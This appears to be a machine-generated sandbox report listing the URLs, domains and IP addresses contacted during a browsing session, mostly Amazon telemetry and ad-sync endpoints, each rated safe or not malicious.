https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3D6NXZ98JFWKRECR4538X7%26ue%3D7%26bb%3D102%26ns%3D137%26ne%3D227%26be%3D629%26fp%3D198%26fcp%3D198%26pc%3D24797%26tc%3D-1555%26na_%3D-1555%26ul_%3D-1723469094449%26_ul%3D-1723469094449%26rd_%3D-1723469094449%26_rd%3D-1723469094449%26fe_%3D-1551%26lk_%3D-1502%26_lk%3D-1502%26co_%3D-1502%26_co%3D-760%26sc_%3D-1488%26rq_%3D-760%26rs_%3D-43%26_rs%3D466%26dl_%3D-33%26di_%3D656%26de_%3D657%26_de%3D701%26_dc%3D24796%26ld_%3D24797%26_ld%3D-1723469094449%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D5%26hoe%3D7%26ld%3D24798%26t%3D1723469119247%26ctb%3D1%26rt%3D__ld%3A92-9-2-75-7-6-1%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7CmutObsYes%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7CmutObsActive%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Cfy_cdn_fr%7Cfy_cdn_mp%7Ccsm-feature-touch-enabled%3Afalse%7Caui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26viz%3Dvisible%3A6%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:248000%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D2669%26pc%3D27642%26at%3D27642%26t%3D1723469122091%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:276420%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/31AGMSYB+OL._SR480,440_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/51Q42KWVMgL._SR480,440_.jpg0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/81LPwvQLXJL._AC_UL225_SR225,160_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/713WPUEZYDL._AC_SY200_.jpg0%Avira URL Cloudsafe
https://x.bidswitch.net/sync_a9/val=G0hb0S_9R-uF3jeZDvl1pA&redirect=https://aax-eu.amazon-adsystem.com/s/ecm3?ex=bidswitch.com&id=${UUID}&gdpr_consent=0%Avira URL Cloudsafe
https://issues.amazon.com/issues/KAT-1534)0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/71YJXiyG3LL._AC_SY200_.jpg0%Avira URL Cloudsafe
https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26sw%3D1280%26sh%3D1024%26vw%3D1280%26vh%3D907%26m%3D1%26sc%3DPAGVV1BKBQP3X0S0NFTP%26ue%3D1%26bb%3D55%26cf%3D159%26be%3D166%26fp%3D130%26fcp%3D130%26pc%3D382%26tc%3D-1095%26na_%3D-1095%26ul_%3D-1723469074018%26_ul%3D-1723469074018%26rd_%3D-1092%26_rd%3D-566%26fe_%3D-566%26lk_%3D-563%26_lk%3D-563%26co_%3D-563%26_co%3D-326%26sc_%3D-563%26rq_%3D-326%26rs_%3D-40%26_rs%3D146%26dl_%3D-36%26di_%3D255%26de_%3D256%26_de%3D259%26_dc%3D380%26ld_%3D381%26_ld%3D-1723469074018%26ntd%3D-1%26ty%3D0%26rc%3D1%26hob%3D1%26hoe%3D1%26ld%3D382%26t%3D1723469074400%26ctb%3D1%26rt%3Dcf%3A13-10-3-0-2-1-1__ld%3A14-11-3-0-2-1-0%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Cfls-eu-amazon-com%7Cadblk_no%7CperfYes%7CmutObsActive%26viz%3Dvisible%3A1%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:3840%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/61oyKtHlCaL._AC_SY200_.jpg0%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D27641%26at%3D27641%26t%3D1723469122090%26csmtags%3DstartVL%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:276410%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/51NCX6DSjPL._AC_UL225_SR225,160_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/S/sash/kfKKBuoqcD$AUKL.woff)0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/41Zp3xaXvPL._SR240,220_.jpg0%Avira URL Cloudsafe
https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D267%26pc%3D397%26at%3D397%26t%3D1723469074415%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:3980%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/A1fXNtoo+RL.js?AUIClients/ACICAssets0%Avira URL Cloudsafe
https://a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net/test.png0%Avira URL Cloudsafe
https://m.media-amazon.com/images/S/sash/e0LnMbFWJC-TMQz.woff)0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/41E6wo15qgL._SR240,220_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/I/71c2DCsZCJS._AC_SY200_.jpg0%Avira URL Cloudsafe
https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg0%Avira URL Cloudsafe
https://rd.frontend.weborama.fr/rd?url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dweborama%26id%3D%7BWEBO_ENC_CID%7D0%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/I/71dwE8Ob46L._AC_UL450_SR450,320_.jpg0%Avira URL Cloudsafe
https://csync.loopme.me/?partner_id=1392&uid=CzBuKoKbRHuwfuuPL_fVTw&gdpr_consent=0%Avira URL Cloudsafe
https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:P3EBDX30THKD0V702NQB$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DP3EBDX30THKD0V702NQB%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D6494%26pc%3D7585%26at%3D7585%26t%3D1723469085491%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DP3EBDX30THKD0V702NQB%26aftb%3D1%26lob%3D1:75840%Avira URL Cloudsafe
https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
d2u28gf9o4d1cv.cloudfront.net
65.9.66.12
truefalse
    unknown
    edger-edger-ra7qmuyuwxzs-482101627.us-west-2.elb.amazonaws.com
    44.226.105.248
    truefalse
      unknown
      eu-eb2.3lift.com
      76.223.111.18
      truefalse
        unknown
        svc.ms-acdc-teams.office.com
        52.123.243.83
        truefalse
          unknown
          web4.iemsi.com
          64.34.23.183
          truefalse
            unknown
            a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net
            13.33.119.133
            truefalse
              unknown
              crb.kargo.com
              3.126.77.184
              truefalse
                unknown
                rtb-csync-euw1.smartadserver.com
                89.149.193.121
                truefalse
                  unknown
                  d1nruqhae353qc.cloudfront.net
                  18.239.63.150
                  truefalse
                    unknown
                    cm.g.doubleclick.net
                    142.250.185.130
                    truefalse
                      unknown
                      www.google.com
                      142.250.185.132
                      truefalse
                        unknown
                        star-mini.c10r.facebook.com
                        157.240.0.35
                        truefalse
                          unknown
                          us-u.openx.net
                          34.98.64.218
                          truefalse
                            unknown
                            pugm-lhrc.pubmnet.com
                            185.64.190.78
                            truefalse
                              unknown
                              abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net
                              108.157.244.180
                              truefalse
                                unknown
                                uip.semasio.net
                                77.243.51.121
                                truefalse
                                  unknown
                                  sync.rfp.fout.jp
                                  35.186.196.148
                                  truefalse
                                    unknown
                                    pug-lhr-bc.pubmnet.com
                                    185.64.191.210
                                    truefalse
                                      unknown
                                      euw-ice.360yield.com
                                      52.49.51.176
                                      truefalse
                                        unknown
                                        sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com
                                        54.154.6.193
                                        truefalse
                                          unknown
                                          envoy-hl.envoy-csync1.core-b8mf.ov1o.com
                                          34.1.224.11
                                          truefalse
                                            unknown
                                            ssum-sec.casalemedia.com
                                            104.18.36.155
                                            truefalse
                                              unknown
                                              djvbdz1obemzo.cloudfront.net
                                              18.239.16.170
                                              truefalse
                                                unknown
                                                url.us.m.mimecastprotect.com
                                                207.211.31.113
                                                truefalse
                                                  unknown
                                                  rd.frontend.weborama.fr
                                                  35.190.24.218
                                                  truefalse
                                                    unknown
                                                    unagi-na.amazon.com
                                                    44.215.130.62
                                                    truefalse
                                                      unknown
                                                      sync.sxp.smartclip.net
                                                      35.186.194.101
                                                      truefalse
                                                        unknown
                                                        iic.jaishict.ru
                                                        188.114.97.3
                                                        truefalse
                                                          unknown
                                                          nkoc4.ancolabi.su
                                                          104.21.62.220
                                                          truefalse
                                                            unknown
                                                            tagr-pixel-nginx-odr-euw4.mookie1.com
                                                            34.160.236.64
                                                            truefalse
                                                              unknown
                                                              specialpoint.net
                                                              188.114.96.3
                                                              truefalse
                                                                unknown
                                                                a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net
                                                                13.249.29.123
                                                                truefalse
                                                                  unknown
                                                                  public-prod-dspcookiematching.dmxleo.com
                                                                  188.65.124.66
                                                                  truefalse
                                                                    unknown
                                                                    user-data-eu.bidswitch.net
                                                                    35.214.149.91
                                                                    truefalse
                                                                      unknown
                                                                      usersync.gumgum.com
                                                                      52.210.15.1
                                                                      truefalse
                                                                        unknown
                                                                        c.media-amazon.com
                                                                        18.239.85.223
                                                                        truefalse
                                                                          unknown
                                                                          dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                                                          34.250.191.11
                                                                          truefalse
                                                                            unknown
                                                                            rtb-csync-euw2.smartadserver.com
                                                                            164.132.25.185
                                                                            truefalse
                                                                              unknown
                                                                              a.nel.cloudflare.com
                                                                              35.190.80.1
                                                                              truefalse
                                                                                unknown
                                                                                static.siege-amazon.com
                                                                                65.9.66.49
                                                                                truefalse
                                                                                  unknown
                                                                                  completion.amazon.co.uk
                                                                                  3.253.177.216
                                                                                  truefalse
                                                                                    unknown
                                                                                    s.amazon-adsystem.com
                                                                                    52.46.128.147
                                                                                    truefalse
                                                                                      unknown
                                                                                      aax-eu.amazon-adsystem.com
                                                                                      52.95.126.138
                                                                                      truefalse
                                                                                        unknown
                                                                                        media.amazon.map.fastly.net
                                                                                        151.101.65.16
                                                                                        truefalse
                                                                                          unknown
                                                                                          d2h8zr0m6mus4x.cloudfront.net
                                                                                          13.32.118.131
                                                                                          truefalse
                                                                                            unknown
                                                                                            completion.amazon.com
                                                                                            44.215.138.240
                                                                                            truefalse
                                                                                              unknown
                                                                                              unagi-eu.amazon.com
                                                                                              67.220.224.105
                                                                                              truefalse
                                                                                                unknown
                                                                                                aax-eu-retail-direct.amazon-adsystem.com
                                                                                                52.95.119.2
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  dsum-sec.casalemedia.com
                                                                                                  172.64.151.101
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com
                                                                                                    18.193.192.41
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      lb.mediarithmics.com
                                                                                                      54.36.150.186
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com
                                                                                                        52.28.91.150
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          ib.anycast.adnxs.com
                                                                                                          185.89.210.90
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            load-euw1.exelator.com
                                                                                                            54.78.254.47
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              dlsq0ztllwnya.cloudfront.net
                                                                                                              52.222.236.76
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                edge.gycpi.b.yahoodns.net
                                                                                                                87.248.119.252
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  endpoint.prod.eu-west-1.forester.a2z.com
                                                                                                                  52.212.43.135
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    match-eu-central-1-ecs.sharethrough.com
                                                                                                                    35.156.61.253
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      uipus.semasio.net
                                                                                                                      50.57.31.206
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        ads.stickyadstv.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          unknown
                                                                                                                          images-na.ssl-images-amazon.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            audex.userreport.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              unagi.amazon.ae
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                unknown
                                                                                                                                www.amazon.de
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  unknown
                                                                                                                                  token.rubiconproject.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    csync.loopme.me
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      lm.serving-sys.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        redirect.prod.experiment.routing.cloudfront.aws.a2z.com
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          images-eu.ssl-images-amazon.com
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            odr.mookie1.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              unknown
                                                                                                                                              cookie-matching.mediarithmics.com
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                pixel.rubiconproject.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  unknown
                                                                                                                                                  c1.adform.net
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    unknown
                                                                                                                                                    sync-amazon.ads.yieldmo.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      unknown
                                                                                                                                                      www.amazon.ae
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        unknown
                                                                                                                                                        url6.mailanyone.net
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          unknown
                                                                                                                                                          usermatch.krxd.net
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            unknown
                                                                                                                                                            uipglob.semasio.net
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              unknown
                                                                                                                                                              m.media-amazon.com
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                unknown
                                                                                                                                                                image6.pubmatic.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  match.sharethrough.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknownfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    loadus.exelator.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknownfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      rtb-csync.smartadserver.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknownfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        image2.pubmatic.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknownfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          capi.connatix.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknownfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            aax-eu.amazon.ae
                                                                                                                                                                            unknown
                                                                                                                                                                            unknownfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              dpm.demdex.net
                                                                                                                                                                              unknown
                                                                                                                                                                              unknownfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                fls-eu.amazon.ae
                                                                                                                                                                                unknown
                                                                                                                                                                                unknownfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  x.bidswitch.net
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    www.facebook.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      beacon.krxd.net
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        tags.bluekai.com
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknownfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          redirect.aecdaily.com
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknownfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            pbs.yahoo.com
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknownfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              bs.serving-sys.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknownfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                ib.adnxs.com
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknownfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  match.360yield.com
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    fls-eu.amazon.com
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      amazon.partners.tremorhub.com
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        completion.amazon.ae
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        unknownfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          https://www.amazon.ae/af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3JlZj1uYXZfbG9nbz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7Dfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3Asi%26si%3D529%26pc%3D4844%26at%3D4844%26t%3D1723469068780%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:4844false
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=01018163eecaf7712c47f919b4fe519c2bd46c2dc95cd92eeb2825c833cd7da6a768&old_oo=0&ts=1723469079116&s=AZFFkf9EtlcrPUPGcSoZIoniWI9NDapON2jwlQi-xiST&gdpr_consent=&gdpr_consent_avl=&cb=1723469079116false
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://images-eu.ssl-images-amazon.com/images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpgfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://lm.serving-sys.com/lm/acs?json={%22GUID%22:%22e8a9b9f8-649a-4e3b-8b9b-bc659c4059fc%22,%22Time%22:%2220240812T132415.199747%22}&rtu=https://aax-eu.amazon-adsystem.com/s/ecm3?ex=sizmek&id=[%tp_UserID%]false
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://images-eu.ssl-images-amazon.com/images/I/31PW3lLCbrL.js?xcpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://images-eu.ssl-images-amazon.com/images/I/61-QN8EAREL._AC_UL225_SR225,160_.jpgfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://images-eu.ssl-images-amazon.com/images/G/39/UFG_AE/Prime/Combined_Learn_More_signup_en_AE.pngfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpgfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://images-eu.ssl-images-amazon.com/images/G/39/UFG_AE/Prime/Prime_quality-guaranteed_400x300_en_AE.pngfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://usersync.gumgum.com/usersync?b=amz&i=oaXwqW9BSkCEPaenhYbK_A&n=y&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DgumgumHMT&id=%5BUID%5D&gdpr_consent=false
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://m.media-amazon.com/images/S/sash/Z8YwjOjqIHxqujG.pngfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpgfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26ctb%3D1%26sc0%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb0%3D402%26pc0%3D4761%26ld0%3D4761%26t0%3D1723469078779%26csmtags%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:4761false
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://m.media-amazon.com/images/I/412CLCbp2pL._SR240,220_.jpgfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://images-eu.ssl-images-amazon.com/images/I/11Q6G8iTFZL.css?xcpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://m.media-amazon.com/images/G/01/msa/vowels/metrics.jpg?time=1723469073783&rand=382473false
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://aax-eu.amazon.ae/e/xsp/imp?b=RFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7Dfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://aax-eu.amazon-adsystem.com/s/ecm3?ex=index&id=L-g7zBtD85twUg2lePzOAzc4dWg4ZgACfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              about:blankfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:99EW8DTCPK04PDBCDQEK$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D99EW8DTCPK04PDBCDQEK%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D1321%26pc%3D5709%26at%3D5709%26t%3D1723469093786%26pty%3DFreshMerchandisedContent%26spty%3Dlearn-more%26pti%3Dlearn-more%26tid%3D99EW8DTCPK04PDBCDQEK%26aftb%3D1%26lob%3D1:5708false
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D7461%26at%3D7461%26t%3D1723469074827%26csmtags%3DendVL%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:7461false
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://aax-eu.amazon-adsystem.com/s/iu3?d=amazon.ae&slot=navFooter&a2=01018163eecaf7712c47f919b4fe519c2bd46c2dc95cd92eeb2825c833cd7da6a768&old_oo=0&ts=1723469095551&s=AQpk3DdUjeD_gde_X-lCDBvoh9mYPPKOxU1_g4FBiIFQ&gdpr_consent=&gdpr_consent_avl=&cb=1723469095551false
                                                                                                                                                                                                                unknown
